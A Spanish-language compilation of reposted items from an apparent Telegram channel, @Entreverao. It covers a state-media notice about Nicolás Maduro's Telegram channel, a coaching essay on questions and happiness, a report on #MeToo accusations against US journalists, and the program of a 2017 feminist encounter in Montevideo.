El Presidente de la República, Nicolás Maduro Moros, cuenta con usuario en el canal Telegram.

Podrán encontrarlo en está plataforma al escribir Nicolás Maduro Moros, donde les aparecerá una fotografía del mandatario con la banda presidencial. Para sumarse solo deben pulsar en la palabra unirse. También pueden hacer clic aquí para seguirlo https://t.me/NicolasMaduroMoros

En la información de su canal Telegram se puede leer: “Presidente de la República de Venezuela. Hijo de Chávez. Construyendo la Patria con eficiencia revolucionaria”.

Hasta las 9:06 de la noche el canal del mandatario contaba con mil 870 miembros.

Entre las publicaciones más recientes del Presidente en su canal Telegram usted podrá leer parte de su intervención este domingo en la clausura de la XII Feria Internacional del Turismo (Fitven) que se desarrolló en la Isla de Margarita, Nueva Esparta.

“Con la Clausura de la FITVEN 2017 el Motor Turismo toma la energía necesaria para desarrollar este sector y convertir a Venezuela en una Potencia Turística, gracias a sus paisajes naturales, atractivos y sitios históricos, únicos en el mundo”, reseña el canal.

Además podrá encontrar gráficas acompañadas de frases del mandatario pronunciadas en la Fitven.

El Presidente Maduro es muy activo en las redes sociales, por ejemplo a través de su cuenta Twitter @NicolasMaduro realiza constantemente anuncios en materia económicos, políticos y sociales que benefician al pueblo.

Fuente: rnv.gob.ve

Telegram @Entreverao

Preguntar y hacerse preguntas para la felicidad

preguntas-filocoaching

Vivir es no haber llegado a la meta, es estar aún en el camino. Por eso, hacerse preguntas es señal de que sigues buscando avanzar, señal de estar en marcha, caminando. Ahora bien, ¿todas las preguntas llevan al mismo destino? Veamos la importancia de las preguntas que nos hacemos para nuestra vida. Hay determinadas preguntan que nos llevan a la felicidad, y otras que nos abren al camino de la amargura. ¿Cómo reconocer la diferencia?

La importancia de las preguntas en la Ciencia y la Filosofía

La Ciencia ha avanzado a base de preguntas, y la Filosofía nació precisamente de las preguntas generadas de la curiosidad, de la capacidad de asombro. La capacidad de sorpresa tiende un puente entre dónde estamos y a dónde queremos ir; lo que sabemos y lo que desconocemos. Si no supiéramos nada, no preguntaríamos; y si supiéramos todo tampoco. Preguntar es señal de estar en medio del camino; de haber avanzado y de tener futuro.

¿Por qué hay algo y no más bien nada? ¿Es real nuestro mundo? ¿Podemos conocerlo? ¿Hay algo después de la muerte? ¿Quiénes somos? ¿Existe la libertad? Son algunas de las preguntas que engloba la Filosofía. La Ciencia especifica preguntas más concretas para acercarse a esos enigmas de una manera particular.

https://www.ivoox.com/player_ej_19594439_4_1.html?c1=ff6600

Hemos avanzado mucho en comprender el Cosmos, y en comprender la mente humana. Sin embargo, hay grandes preguntas que siguen sin una respuesta oficial. Esto no quita que cada persona no responda de un modo u otro a ellas, pues en realidad entre preguntas y respuestas se mueve la vida. Justamente porque esos primeros seres humanos se preguntaron qué podían hacer con el fuego, o qué había más allá de su poblado, desarrollaron técnicas y se expandieron. A base de preguntas comprendemos el mundo, pero también lo creamos.

El arte de hacerse preguntas en la vida cotidiana

No sabemos si tendremos todas las respuestas en la vida, pero es más probable que aparezcan las respuestas de las preguntas que nos hacemos que aquellas hacia las que no hemos preguntado. Además, más allá de si encontraremos o no una respuesta, lo cierto es que si dejamos de preguntar, es señal de que hemos dejado de intentar encontrar respuestas.

Por tanto, pregúntate ¿me estoy haciendo preguntas a menudo o más bien poco? ¿Qué tipo de preguntas me hago? ¿A dónde me han llevado hasta ahora mis preguntas? ¿Qué preguntas me hice para tomar aquella decisión que ha sido un éxito? ¿Y qué preguntas me hice para tomar aquella mala decisión que tomé?

HERRAMIENTA-DE-COACHING-PREGUNTAS-PODEROSAS

Las preguntas son la herramienta de coaching por excelencia: esa herramienta que puede utilizar cualquier persona en su día a día y ser coach dentro de su empresa, con sus hijos, con un amigo… Es la alternativa a dar consejos, presumir lo que el otro dice o piensa… Una persona puede influir muchísimo en otra por la forma en que se expresa, las cosas que dice y, sobre todo, las preguntas que hace. Por eso en coaching hablamos de preguntas poderosas, para referirnos a esas preguntas que realmente provocan cambios en otras personas.

Las preguntas PARF son una herramienta de COACHING para llevar a la persona en una conversación a ser constructiva, abrir opciones, asumir la responsabilidad y cambiar algo en el futuro. ¡Pruébalas como una posible estructura de tu comunicación, y observa sus frutos en los demás, tus relaciones y los resultados!

Las preguntas son como llaves, ¿a qué sala quieres ir?

Las preguntas son como llaves, que nos abren una puerta u otra, en un mundo lleno de salas, dentro de otras salas… ¿Qué llave escoges tú en la sala donde ahora te encuentras? Cada situación es como una sala en nuestro mundo, en nuestra vida. Hemos llegado hasta ella a partir de las preguntas y respuestas anteriores. En este momento de la partida, en cada uno, podemos volver a elegir qué preguntas hacemos.

Por ejemplo, alguien que se acaba de quedar en el paro, puede preguntarse muchas cosas: ¿qué he aprendido de este trabajo? ¿de qué estoy agradecido? ¿qué quiero hacer ahora? ¿qué opciones tengo? Todas estas preguntas llevan a salas de aprendizaje, de agradecimiento y de crecimiento. En cambio, otras preguntas podrían llevar a salas de tristeza, victimismo o destrucción. Por ejemplo, ¿quién tiene la culpa? ¿y si no encuentro trabajo? ¿qué podía haber logrado en mi carrera si no me hubieran echado de aquel trabajo?, etc.

«Es preciso sacudir enérgicamente el bosque de las neuronas cerebrales adormecidas; es menester hacerlas vibrar con la emoción de lo nuevo e infundirles nobles y elevadas inquietudes» Santiago Ramón y Cajal

Heidegger: “El asombro no es solamente aquello que nos impulsa hacia la Filosofía, no se encuentra simplemente al comienzo de la Filosofía, sino que sostiene y domina la Filosofía”

Preguntas y felicidad, un binomio paradójico

Las preguntas pueden orientarse a la felicidad, pero también cabe preguntarse si ciertas preguntas alejan de la felicidad, y si la búsqueda absoluta de la felicidad puede dificultar hacerse preguntas. Claro, si pensamos en la felicidad como el placer constante, el bienestar concreto, es probable que evitemos preguntas incómodas. La salida de la caverna de Platón al principio ciega porque duele ver el Sol directamente a quien siempre ha estado en una oscura cueva. Cualquier curva de aprendizaje implica dificultad e incomodidad. Por eso se habla de salir de la zona de confort, que curiosamente se expande y hace que estemos más cómodos donde antes estábamos incómodos.

Las preguntas filosóficas de siempre, aquellas que se hicieron los griegos sobre el arjé, el principio, o aquellas que se han hecho a lo largo de la toda la Historia de la Filosofía sobre quiénes somos, el sentido de la vida, etc son puertas a la felicidad pero que a menudo comienzan con una oposición fuerte de la sociedad y del sistema, que puede hacernos percibir que en realidad nos alejan de la felicidad aunque no sea así.

Hay una falacia lógica que dice ‘post hoc, ergo propter hoc’. Si lo traducimos del latín, vendría a decir: ‘después de esto, por tanto, como consecuencia de esto’. Es una falacia, porque en realidad que dos hechos sucedan uno detrás del otro no implica que estén relacionados ni que sea una relación causa-efecto. Lo que pasa que a menudo nos sentimos así. Vamos a escuchar un fragmento de la película La Isla.

El escritor y filósofo Aldous Huxley reflexionó sobre este tema con su famosa novela ‘Un mundo feliz’. La novela anticipa el desarrollo en tecnología reproductiva, cultivos humanos e hipnopedia que, combinadas, cambian radicalmente la sociedad. El mundo aquí descrito podría ser una utopía, aunque irónica y ambigua: la humanidad es desenfadada, saludable y avanzada tecnológicamente.

En principio parece, como dice el título de la novela, un mundo bastante feliz. La guerra y la pobreza han sido erradicadas, y todos son permanentemente felices. Sin embargo, la ironía es que todas estas cosas se han alcanzado tras eliminar muchas otras: la familia, la diversidad cultural, el arte, el avance de la ciencia, la literatura, la filosofía…

 

“Cada uno de nosotros existe durante un tiempo muy breve, y en dicho intervalo tan sólo explora una parte diminuta del conjunto del universo. Pero los humanos somos una especie marcada por la curiosidad. Nos preguntamos, buscamos respuestas. Viviendo en este vasto mundo, que a veces es amable y a veces cruel, y contemplando la inmensidad del firmamento encima de nosotros, nos hemos hecho siempre una multitud de preguntas. ¿Cómo podemos comprender el mundo en que nos hallamos? ¿Cómo se comporta el universo? ¿Cuál es la naturaleza de la realidad? ¿De dónde viene todo lo que nos rodea? ¿Necesitó el Universo un Creador?”

Stephen Hawking y Leonard Mlodinow, El gran diseño, “Capítulo 1

Telegram @Entreverao

El escándalo del acoso sexual en EE.UU. también salpica a la prensa

Después de que medios de comunicación emblemáticos de EE.UU., como la revista The New Yorker o la cadena CNN, sacaran a la luz la impunidad con la que personalidades de Hollywood y del Congreso acosaron a mujeres durante añosla polémica se vuelve ahora contra la propia industria periodística.

Como si de fichas de dominó se tratarán, en las últimas semanas una a una han ido cayendo personalidades en un baúl sin fondo en el que podrían desvanecerse un sinfín de carreras que se encuentran en jaque por presuntas conductas inapropiadas.

Paradójicamente, ni un guionista de Hollywood hubiera podido imaginar una apertura más mediática de esta peculiar “caja de Pandora”.

Todo comenzó con el artículo que el hijo del popular director de cine Woody Allen, Ronan Farrow, publicó en octubre pasado en la prestigiosa revista The New Yorker en el que se hacía eco de las denuncias de varias mujeres contra el todopoderoso productor Harvey Weinstein.

Surgió entonces una reacción generalizada entre ciudadanos de todo el país que comenzaron a denunciar sus casos a través de Twitter con una campaña que lleva la etiqueta #MeToo (“YoTambién”), acusaciones que, en caso de afectar a alguna figura pública, acababan difundiendo los propios medios de comunicación.

Esta campaña ha puesto bajo la lupa a figuras tan relevantes como el actor Kevin Spacey, el popular senador demócrata Al Franken, el cantante Nick Carter o el candidato republicano al Senado por el estado de Alabama, Roy Moore.

Sin embargo, esta tendencia no se para en aquellos que acaparan los focos y, en los últimos días, ha comenzado a fijar su objetivo en lo que pasa detrás de las cámaras.

Este martes, las cadenas de televisión CBS y PBS anunciaron el despido del veterano presentador estrella Charlie Rose por el comportamiento “perturbador e intolerable” que tuvo el periodista con algunas de las mujeres que trabajaron con él en su programa de entrevistas, según un comunicado emitido por la propia CBS.

De acuerdo con el reportaje del periódico The Washington Post que destapó el abusivo comportamiento de Rose, cuyo programa de entrevistas llevaba en antena desde 1991, hasta ocho mujeres acusan al presentador de conductas como andar desnudo en su presencia o realizar llamadas telefónicas subidas de tono.

Otro caso significativo es el del reportero Glenn Thrush, quien, tras años cubriendo la Casa Blanca para el diario especializado Politico y, ahora, para The New York Times, fue suspendido esta semana por este último periódico después de que tres mujeres vertieran acusaciones que invitan a pensar en un patrón que el periódicoha calificado de “muy preocupante”.

“Thrush, sólo por su talla, puso a mujeres en una posición de que tenían que tragar y seguir adelante después de un encuentro incómodo”, relató la autora del artículo publicado por Vox, Laura McGann, que destapó el comportamiento del periodista, coincidió con él en Politico y es una de las tres acusadoras.

Ningún soporte y ninguna cabecera parece estar a salvo de este intercambio de mediáticas acusaciones convertido en un imparable alud que va enterrando prestigiosas carreras a su paso.

Lockhart Steele, de la propia revista Vox, también ha sido acusado de conducta inapropiada; como lo han sido Hamilton Fish, de The New Republic; Leon Wieseltier, de The Atlantic; o Matthew Zimmerman, de la cadena NBC.

Todos ellos han sido despedidos o suspendidos por este tipo de acusaciones a lo largo del último mes.

Tras estas acusaciones, estos periodistas están pagando el precio de sus propios actos, dentro del debate que ha surgido en el país y que refleja la concienciación de una sociedad con la que algunos de ellos llegaron a colaborar y que ya no tolera ciertas conductas.

Buena prueba de ello es el caso del expresentador estrella de la cadena Fox News Bill O’Reilly, quien antes de ser finalmente despedido este verano al situarse en una posición ya insostenible, había llegado a firmar una jugosa renovación a pesar de los acuerdos extrajudiciales millonarios con mujeres a los que su empresa había tenido que hacer frente para tapar los desmanes del periodista.

“Ahora con todo lo que está pasando, sinceramente, tenemos muchas más historias de las que nos gustaría contar”, declaró este lunes a la PBS Irin Carmon, coautora del artículo que ha acabado hundiendo a Charlie Rose, quien lamentó que cuando se enteró de la historia, en 2010, “la gente no estaba preparada para hablar”.

Fuente: giraenlared

Telegram @Entreverao

Uruguay recibe el 14° Encuentro Feminista Latinoamericano y del Caribe De 23 al 25 de noviembre

La edición número 14 del Encuentro Feminista Latinoamericano y del Caribe (EFLAC) se realizará esta semana, entre el 23 y el 25 de noviembre, en Montevideo.

Mujeres de todo el continente vendrán a conversar sobre feminismo e igualdad de género, en un evento que recuerda a las hermanas Mirabal, torturadas y asesinadas el 25 de noviembre de 1960 por la dictadura del General Trujillo en República Dominicana.

Asambleas, actividades auto-gestionadas, espectáculos artísticos, conversatorios y demás tendrán lugar en esta actividad que tendrá lugar en la Rural del Prado.

Programa del evento

Jueves 23 de noviembre

8:00: Acreditaciones
9:30: Apertura
11:00: Asambleas
13:00 Almuerzo
14:00 a 18 horas: Actividades auto-gestionadas
20:00: Espectáculo artístico en el Teatro Solís.

Viernes 24 de noviembre

9:00: Asambleas

13:00 Almuerzo
14:00 a 18:00: Actividades auto-gestionadas
19:30: Espectáculos artísticos en la Plaza Fabini.

Sábado 25 de noviembre

9:00: Plenaria
14:30: Almuerzo
16:30 Salida hacia la marcha a 18 de Julio
23:00. Cierre de las actividades

Las participantes del EFLAC se unirán a la marcha organizada por Mujeres de Negro, que recorrerá desde la explanada de la UDELAR, en 18 de julio, hasta la Plaza Independencia. Al llegar a la plaza, Minou Tavarez Mirabal, hija y sobrina de las hermanas dominicanas, dará unas palabras a la concurrencia.

Fuente: albatv

Telegram @Entreverao